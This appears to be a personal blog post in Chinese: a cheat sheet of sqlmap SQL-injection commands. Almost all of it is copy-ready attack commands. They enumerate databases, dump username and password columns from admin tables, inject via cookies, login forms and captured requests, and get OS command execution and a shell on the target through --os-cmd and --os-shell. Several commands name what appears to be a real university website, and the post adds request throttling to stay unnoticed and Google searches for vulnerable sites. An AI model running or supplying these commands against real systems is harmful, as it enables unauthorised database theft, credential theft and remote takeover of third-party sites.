GrayTensor 's Blog

即使赚的了全世界,却失去了自己,又有什么意义呢。

sqlmap注入语句

asp注入点

下面爆字段,输入命令:python sqlmap.py -u https://192.168.121.1/NewsView.asp?id=8 --columns -T admin 查看admin表所在的列名


获取内容,python sqlmap.py -u https://192.168.121.1/NewsView.asp?id=8 --dump -C username,password -T admin


mysql注入语句


sqlmap.py -u https://192.168.121.1/News.php?nid=8 --dbs

获取数据库

sqlmap.py -u https://192.168.121.1/News.php?nid=8 -D 数据库 --tables

获取表

sqlmap.py -u https://192.168.121.1/News.php?nid=8 -D 数据库 -T 表段 --columns

获取字段

sqlmap.py -u https://192.168.121.1/News.php?nid=8 -D 数据库 -T 表段 -C 字段,字段 --dump

获取内容


cookie注入语句

sqlmap.py -u https://192.168.121.1/News.asp --cookie "id=58" --tables --leve 2

获取表

sqlmap.py -u https://192.168.121.1/News.asp --cookie "id=58" --columns -T 表段 --leve 2

获取字段

sqlmap.py -u https://192.168.121.1/News.asp --cookie "id=58" --dump -T admin -C "字段,字段" --leve 2


post登录框注入

自动获取表单sqlmap.py -u https://testasp.vulnweb.com/Login.asp --forms

自定义表单sqlmap -u https://testasp.vulnweb.com/Login.asp --data "tfUName=1&tfUPass=1"


burpsuit抓包复制txt放在sqlmap根目录

sqlmap.py -r test.txt -p username --dbs


交互写shell及命令执行  首先要知道站点根目录

sqlmap.py -u https://192.168.159.1/news.php?id=1 --os-cmd=ipconfig

写目标站点的根目录

sqlmap.py -u https://192.168.159.1/news.php?id=1 --os-shell

写目标站点的根目录


伪静态注入

sqlmap.py -u https://sfl.fzu.edu.cn/index.php/Index/view/id/40*.html --dbs

获取数据库

sqlmap.py -u https://sfl.fzu.edu.cn/index.php/Index/view/id/40*.html -D 数据库 --tables

获取表段

sqlmap.py -u https://sfl.fzu.edu.cn/index.php/Index/view/id/40*.html -D 数据库 -T 表段 --columns

获取字段

sqlmap.py -u https://sfl.fzu.edu.cn/index.php/Index/view/id/40*.html -D 数据库 -T 表段 -C  字段 --dump


请求延时

参数 --delay --safe-freq

例子 秒计算sqlmap.py --dbs -u https://sfl.fzu.edu.cn/index.php/Index/view/id/40*.html --delay 5

次数计算sqlmap.py --dbs -u https://sfl.fzu.edu.cn/index.php/Index/view/id/40*.html --safe -freq 5


google搜索注入点

sqlmap.py -g 关键词


评论

© GrayTensor 's Blog | Powered by LOFTER